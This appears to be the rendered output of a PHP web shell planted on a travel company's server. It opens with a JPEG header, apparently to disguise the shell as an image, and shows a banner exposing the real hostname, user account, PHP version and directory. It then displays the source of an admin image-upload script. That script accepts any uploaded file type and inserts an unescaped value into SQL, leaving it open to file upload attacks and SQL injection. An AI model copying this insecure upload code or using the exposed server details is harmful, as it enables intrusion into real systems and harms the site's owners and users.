ÿØÿà JFIF ` ` ÿþ
Server : Apache System : Linux ruga7-004.fmcity.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64 User : tkt_travelbus ( 1137) PHP Version : 7.0.0p1 Disable Function : mysql_pconnect Directory : /tkt_travelbus/www/toadmin/good_en/ |
Upload File : |
<? include "../include/top_proc.html"; include "_common.php"; // // 관광지 이미지 업로드 // // $destination : 이미지가 저장될 경로 // $departure : 원본 이미지 경로 // $size : _getimagesize() 의 return 값을 넣을 것 // $quality : JPG 퀄리티 // $ratio : 비율 강제설정 // $savedir = $cf['path']."/FileData/good_img/"; $savedir2 = $cf['path']."/FileData/good_img_thum/"; $FileNM = $_FILES['file']['name']; if($FileNM){ // 임의의 파일명 생성 (20090911 ) : main.class 에 추가 $sFileNM = getUniqueFileName($FileNM); // 동일 파일이 있는지 체크를 위해 파일명과 확장자를 가져옴 (20090917 ) $f = explode(".", $sFileNM); $ext = strtolower(array_pop($f)); $f_name = implode(".", $f); // 동일 파일이 있는지 체크 $r = 1; while (file_exists($savedir."/".$sFileNM)) { $sFileNM = $f_name . "(" . $r++ . ")." . $ext; } // 파일 업로드 처리 move_uploaded_file($_FILES['file']['tmp_name'], $savedir."/".$sFileNM); // 호텔정보 코드를 가져옴 (20090917 ) $ImgType = "A"; // 이미지 등록 $sql = "insert into TB_GoodImg(Gidx,ImgType,ImgTitle,RegDate) values('".$Goods_Code."','".$ImgType."','".$sFileNM."',now())"; $res = db_query( $sql); $save_image_path=$savedir.$sFileNM; $mimg_save_path=$savedir2.$sFileNM; $img_size = GetImageSize("$save_image_path"); $img_width = $img_size[0]; //이미지의 넓이를 알 수 있음 $img_height = $img_size[1]; //이미지의 높이를 알 수 있음 $image_quality = 100; $pos = strrpos($FileNM,"."); $ext = substr($FileNM,$pos+1); if($img_width>214 || $img_height>149){ thumbnailImageCreate($save_image_path, $mimg_save_path, "214", "149", "", $ext, $background_color, $image_quality);//250 이미지 생성 } // 이미지 썸네일 생성 (20090909 ) $src = $save_image_path; // 원본 $dst = $mimg_save_path; // 썸네일 $quality = '100'; // jpg 퀄리티 $size = '200'; // 줄일 크기 pixel (너비, 또는 높이에 적용) //$ratio = '1:1'; // 이미지를 4:3 비율로 잘라냄 $ratio = 'false'; // 원본 이미지비율을 유지 $get_size = _getimagesize($src, $size, $ratio); $result = resize_image($dst, $src, $get_size, $quality, $ratio); // 이미지 썸네일 생성 끝 (20090909 ) } ?>